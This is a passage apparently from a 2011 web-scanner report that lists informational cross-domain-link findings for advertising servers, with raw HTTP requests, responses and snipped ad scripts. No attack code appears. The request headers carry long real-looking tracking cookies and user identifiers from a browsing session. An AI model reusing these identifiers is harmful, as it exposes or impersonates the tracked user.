Set-Cookie: adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Set-Cookie: pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:22 GMT
Content-Length: 10227

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
="http://r.turn.com/r/formclick/id/YD_UEYO-LSRaWwYA9wEBAA/url/%chttp%3A//bs.serving-sys.com/BurstingPipe/adServer.bs%3Fcn%3Dbrd%26FlightID%3D2362495%26Page%3D%26PluID%3D0%26Pos%3D4970" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2362495&Page=&PluID=0&Pos=4970" border=0 width=300 height=250></a>
...[SNIP]...
<img border="0" src="http://r.turn.com/r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid="> \n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true"/> \n                </span>
...[SNIP]...

19.8. http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.us.doubleclick.net
Path:	/adj/ftcom.5887.ftfm/private-equity

Issue detail

The page was loaded from a URL containing a query string:

http://ad.us.doubleclick.net/adj/ftcom.5887.ftfm/private-equity;sz=468x60,728x90;dcopt=ist;14=usa;cn=nor;u=uuid=private-equity,ts=20110512060306;pos=banlb;tile=1;ord=1762542170472443?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2803881/2991_fDiIntel_IPA_Leader1.gif

Request

GET /adj/ftcom.5887.ftfm/private-equity;sz=468x60,728x90;dcopt=ist;14=usa;cn=nor;u=uuid=private-equity,ts=20110512060306;pos=banlb;tile=1;ord=1762542170472443? HTTP/1.1
Host: ad.us.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 382
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 12 May 2011 11:03:07 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.us.doubleclick.net/click;h=v8/3b05/0/0/%2a/d;225735041;22-0;3;52875020;3454-728/90;38296178/38313935/1;u=uuid=private-equity,ts=20110512060306;~aopt=2/1/29/0;~sscs=%3fhttp://www.fdiintelligence.com/ftoi"><img src="http://s0.2mdn.net/viewad/2803881/2991_fDiIntel_IPA_Leader1.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.9. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/pixel?&id=1095717&id=698998&id=1230057&id=1253950&id=1250690&id=1229700&id=915172&id=1198835&id=1239839&id=1266660&id=1255251&id=939942&id=1278096&id=1228264&id=1238288&id=1264716&id=1006907&id=1238467&id=1224511&id=1081668&id=1216952&id=956404&id=940005&id=1268278&id=1050626&id=1294447&id=950991&id=1283938&id=956405&id=1212821&id=1239555&id=992290&id=1238433&id=1212819&id=1094107&id=502881&id=1156121&id=1239571&id=939987&id=612033&id=1023063&id=1238971&id=1085597&id=1210932&id=1049055&id=1229727&id=1198834&id=1282674&id=1230109&t=1

The response contains the following links to other domains:

http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=6gplCPXJ6wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=Dtp9CMW-4AEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=RmcwCOXM6QEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=WkdyCKXa-wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=XFL7COWz7gEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=muhJCP2z9wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1033191019/?label=ooGmCK2U7wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=0pAQCKDe0wEQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=2dBwCMDggwIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=3Nn5CODGggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=6L6cCMC7ggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=TUhzCKingwIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZIPUCNDXggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=ZKywCJjtggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=e-86CNDegwIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=n2ACCPDEggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=nbI8CJjeggIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=uk38CIiX0QEQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=yfh4CPjKgwIQjPe59AM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/1033191019/?label=mxelCP2b-gEQ6_zU7AM&guid=ON&script=0

Request

GET /pixel?&id=1095717&id=698998&id=1230057&id=1253950&id=1250690&id=1229700&id=915172&id=1198835&id=1239839&id=1266660&id=1255251&id=939942&id=1278096&id=1228264&id=1238288&id=1264716&id=1006907&id=1238467&id=1224511&id=1081668&id=1216952&id=956404&id=940005&id=1268278&id=1050626&id=1294447&id=950991&id=1283938&id=956405&id=1212821&id=1239555&id=992290&id=1238433&id=1212819&id=1094107&id=502881&id=1156121&id=1239571&id=939987&id=612033&id=1023063&id=1238971&id=1085597&id=1210932&id=1049055&id=1229727&id=1198834&id=1282674&id=1230109&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; ih="b!!!!Q!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; pv1="b!!!!:!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~"; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x